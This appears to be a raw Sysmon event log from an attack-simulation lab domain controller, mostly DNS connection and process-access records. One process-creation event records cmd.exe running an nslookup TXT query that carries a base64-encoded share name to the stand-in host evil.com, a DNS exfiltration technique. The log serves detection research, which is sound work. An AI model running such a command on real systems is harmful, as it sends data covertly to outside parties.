process>-udpfalsefalse127.0.0.1-50772-false127.0.0.1-53domain 354300x8000000000000000210197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.053{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50772- 354300x8000000000000000210196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.053{00000000-0000-0000-0000-000000000000}8020<unknown process>-udptruefalse127.0.0.1-50772-false127.0.0.1-53domain 354300x8000000000000000210195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.052{00000000-0000-0000-0000-000000000000}8020<unknown process>-udpfalsefalse127.0.0.1-50771-false127.0.0.1-53domain 354300x8000000000000000210194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.052{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50771- 354300x8000000000000000210193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.052{00000000-0000-0000-0000-000000000000}8020<unknown process>-udptruefalse127.0.0.1-50771-false127.0.0.1-53domain 354300x8000000000000000210192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.052{00000000-0000-0000-0000-000000000000}8020<unknown process>-udpfalsefalse127.0.0.1-50770-false127.0.0.1-53domain 354300x8000000000000000210191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.052{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50770- 354300x8000000000000000210190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.052{00000000-0000-0000-0000-000000000000}8020<unknown process>-udptruefalse127.0.0.1-50770-false127.0.0.1-53domain 354300x8000000000000000210189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.999{00000000-0000-0000-0000-000000000000}7788<unknown process>-udpfalsefalse127.0.0.1-50769-false127.0.0.1-53domain 354300x8000000000000000210188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.999{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50769- 354300x8000000000000000210187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.999{00000000-0000-0000-0000-000000000000}7788<unknown process>-udptruefalse127.0.0.1-50769-false127.0.0.1-53domain 354300x8000000000000000210186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.999{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50768- 354300x8000000000000000210185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.999{00000000-0000-0000-0000-000000000000}7788<unknown process>-udptruefalse127.0.0.1-50768-false127.0.0.1-53domain 354300x8000000000000000210184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.998{00000000-0000-0000-0000-000000000000}7788<unknown process>-udpfalsefalse127.0.0.1-50767-false127.0.0.1-53domain 354300x8000000000000000210183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.998{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50767- 354300x8000000000000000210182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.998{00000000-0000-0000-0000-000000000000}7788<unknown process>-udptruefalse127.0.0.1-50767-false127.0.0.1-53domain 354300x8000000000000000210181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.925{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-50766-false127.0.0.1-53domain 354300x8000000000000000210180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.925{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50766- 354300x8000000000000000210179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.925{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-50766-false127.0.0.1-53domain 354300x8000000000000000210178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.925{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-50765-false127.0.0.1-53domain 354300x8000000000000000210177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.925{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50765- 354300x8000000000000000210176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.923{00000000-0000-0000-0000-000000000000}7744<unknown process>-udpfalsefalse127.0.0.1-50764-false127.0.0.1-53domain 354300x8000000000000000210175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.923{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50764- 354300x8000000000000000210174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.923{00000000-0000-0000-0000-000000000000}7744<unknown process>-udptruefalse127.0.0.1-50764-false127.0.0.1-53domain 354300x8000000000000000210173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.850{00000000-0000-0000-0000-000000000000}6448<unknown process>-udpfalsefalse127.0.0.1-50763-false127.0.0.1-53domain 354300x8000000000000000210172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.850{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50763- 354300x8000000000000000210171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.850{00000000-0000-0000-0000-000000000000}6448<unknown process>-udptruefalse127.0.0.1-50763-false127.0.0.1-53domain 354300x8000000000000000210170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.850{00000000-0000-0000-0000-000000000000}6448<unknown process>-udpfalsefalse127.0.0.1-50762-false127.0.0.1-53domain 354300x8000000000000000210169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.850{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50762- 354300x8000000000000000210168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.849{00000000-0000-0000-0000-000000000000}6448<unknown process>-udptruefalse127.0.0.1-50762-false127.0.0.1-53domain 354300x8000000000000000210167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.849{00000000-0000-0000-0000-000000000000}6448<unknown process>-udpfalsefalse127.0.0.1-50761-false127.0.0.1-53domain 354300x8000000000000000210166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.849{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50761- 354300x8000000000000000210165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.849{00000000-0000-0000-0000-000000000000}6448<unknown process>-udptruefalse127.0.0.1-50761-false127.0.0.1-53domain 354300x8000000000000000210164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.757{00000000-0000-0000-0000-000000000000}7408<unknown process>-udpfalsefalse127.0.0.1-50760-false127.0.0.1-53domain 354300x8000000000000000210163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.757{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50760- 354300x8000000000000000210162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.756{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50759- 354300x8000000000000000210161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.756{00000000-0000-0000-0000-000000000000}7408<unknown process>-udptruefalse127.0.0.1-50759-false127.0.0.1-53domain 354300x8000000000000000210160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.756{00000000-0000-0000-0000-000000000000}7408<unknown process>-udpfalsefalse127.0.0.1-50758-false127.0.0.1-53domain 354300x8000000000000000210159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.756{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50758- 354300x8000000000000000210158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.756{00000000-0000-0000-0000-000000000000}7408<unknown process>-udptruefalse127.0.0.1-50758-false127.0.0.1-53domain 354300x8000000000000000210157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{00000000-0000-0000-0000-000000000000}6432<unknown process>-udpfalsefalse127.0.0.1-50757-false127.0.0.1-53domain 354300x8000000000000000210156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50757- 354300x8000000000000000210155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{00000000-0000-0000-0000-000000000000}6432<unknown process>-udptruefalse127.0.0.1-50757-false127.0.0.1-53domain 354300x8000000000000000210154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50756- 354300x8000000000000000210153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{00000000-0000-0000-0000-000000000000}6432<unknown process>-udptruefalse127.0.0.1-50756-false127.0.0.1-53domain 354300x8000000000000000210152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50755- 354300x8000000000000000210151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.674{00000000-0000-0000-0000-000000000000}6432<unknown process>-udptruefalse127.0.0.1-50755-false127.0.0.1-53domain 354300x8000000000000000210150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50754- 354300x8000000000000000210149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50753- 354300x8000000000000000210148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{00000000-0000-0000-0000-000000000000}3868<unknown process>-udptruefalse127.0.0.1-50753-false127.0.0.1-53domain 354300x8000000000000000210147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{00000000-0000-0000-0000-000000000000}3868<unknown process>-udpfalsefalse127.0.0.1-50752-false127.0.0.1-53domain 354300x8000000000000000210146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.609{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50752- 354300x8000000000000000210145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.547{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-50751-false127.0.0.1-53domain 354300x8000000000000000210144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.547{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-50751-false127.0.0.1-53domain 354300x8000000000000000210143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.546{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-50749-false127.0.0.1-53domain 354300x8000000000000000210142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-50748-false127.0.0.1-53domain 354300x8000000000000000210141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.470{00000000-0000-0000-0000-000000000000}8132<unknown process>-udptruefalse127.0.0.1-50748-false127.0.0.1-53domain 354300x8000000000000000210140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{00000000-0000-0000-0000-000000000000}5196<unknown process>-udptruefalse127.0.0.1-50745-false127.0.0.1-53domain 354300x8000000000000000210139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{00000000-0000-0000-0000-000000000000}5196<unknown process>-udpfalsefalse127.0.0.1-50744-false127.0.0.1-53domain 10341000x8000000000000000210138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.081{2E1864BB-18EF-629A-2444-000000005F02}6847576C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2544-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.081{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2544-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.081{2E1864BB-18EF-629A-2344-000000005F02}16966516C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-2544-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.089{2E1864BB-18EF-629A-2544-000000005F02}5836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-2344-000000005F02}1696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrc.tmp 2>&1 10341000x8000000000000000210130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.059{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2444-000000005F02}684C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.059{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2444-000000005F02}684C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.059{2E1864BB-18EF-629A-2444-000000005F02}6847576C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2344-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.044{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2444-000000005F02}684C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.044{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2344-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 